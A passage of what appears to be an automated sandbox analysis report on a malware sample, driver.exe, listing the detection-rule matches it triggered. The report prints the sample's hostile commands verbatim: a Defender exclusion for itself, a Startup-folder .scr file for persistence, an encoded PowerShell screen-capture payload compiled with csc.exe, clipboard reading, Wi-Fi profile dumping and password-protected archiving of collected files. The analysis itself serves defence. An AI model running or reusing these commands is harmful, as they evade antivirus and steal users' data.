QAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAA
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\driver.exe", ParentImage: C:\Users\user\Desktop\driver.exe, ParentProcessId: 6620, ParentProcessName: driver.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 7368, ProcessName: cmd.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\driver.exe", ParentImage: C:\Users\user\Desktop\driver.exe, ParentProcessId: 6620, ParentProcessName: driver.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'", ProcessId: 1472, ProcessName: cmd.exe
              Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\driver.exe, ProcessId: 6620, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\driver.exe, ProcessId: 6620, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\driver.exe, ProcessId: 6620, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ?? .scr
              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3560, TargetFilename: C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline
              Source: Process startedAuthor: Timur Zinniatullin, E.M. Anhaus, oscd.community: Data: Command: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7972, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe a -r -hp"y" "C:\Users\user\AppData\Local\Temp\Ffb7z.zip" *, ProcessId: 7200, ProcessName: rar.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1472, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\driver.exe', ProcessId: 2128, ProcessName: powershell.exe
              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2568, ProcessName: svchost.exe

              Data Obfuscation

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c4gv4hox\c4gv4hox.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAA

              Stealing of Sensitive Information

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\driver.exe", ParentImage: C:\Users\user\Desktop\driver.exe, ParentProcessId: 6620, ParentProcessName: driver.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 7740, ProcessName: cmd.exe
              No Suricata rule has matched

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: driver.exeVirustotal: Detection: 43%Perma Link
              Source: driver.exeReversingLabs: Detection: 36%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
              Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exeCode function: 77_2_00007FF75425901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,77_2_00007FF75425901C
              Source: driver.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053584283.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: driver.exe, 00000000.00000003.2050573747.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: driver.exe, 00000002.00000002.2452292275.00007FF8A8EF1000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050305577.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052687607.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053185543.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2051305695.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053261566.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050911487.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053107068.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: driver.exe, 00000002.00000002.2455137415.00007FF8B8F71000.00000040.00000001.01000000.00000007.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053185543.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052114302.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053891584.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050107027.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052770906.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052032548.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: driver.exe, 00000002.00000002.2454712947.00007FF8B8B3B000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052283988.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050482974.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: driver.exe, 00000002.00000002.2449988563.00007FF8A8BD9000.00000040.00000001.01000000.00000005.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053107068.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053891584.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: driver.exe, 00000000.00000003.2050744012.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052687607.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: driver.exe, 00000000.00000003.2052601392.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052032548.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: driver.exe, 00000000.00000003.2049030918.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp, driver.exe, 00000002.00000002.2456490547.00007FF8B9F74000.00000002.00000001.01000000.00000006.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: driver.exe, 00000000.00000003.2051216435.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052448279.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2053818515.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: driver.exe, 00000000.00000003.2052186692.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050305577.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2051128075.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdbGCTL source: driver.exe, 00000000.00000003.2051216435.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: driver.exe, 00000000.00000003.2051451471.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: driver.exe, 00000002.00000002.2456731347.00007FF8BA4F1000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: driver.exe, 00000000.00000003.2052365271.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2050107027.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053499525.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2054053292.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052527881.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: driver.exe, 00000000.00000003.2051019921.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdbGCTL source: driver.exe, 00000000.00000003.2052365271.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: driver.exe, driver.exe, 00000002.00000002.2447484516.00007FF8A80C5000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053261566.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053818515.000001C6D7270000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: driver.exe, 00000002.00000002.2452820005.00007FF8B7E11000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: driver.exe, 00000000.00000003.2053342813.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: driver.exe, 00000000.00000003.2051305695.000001C6D7277000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < 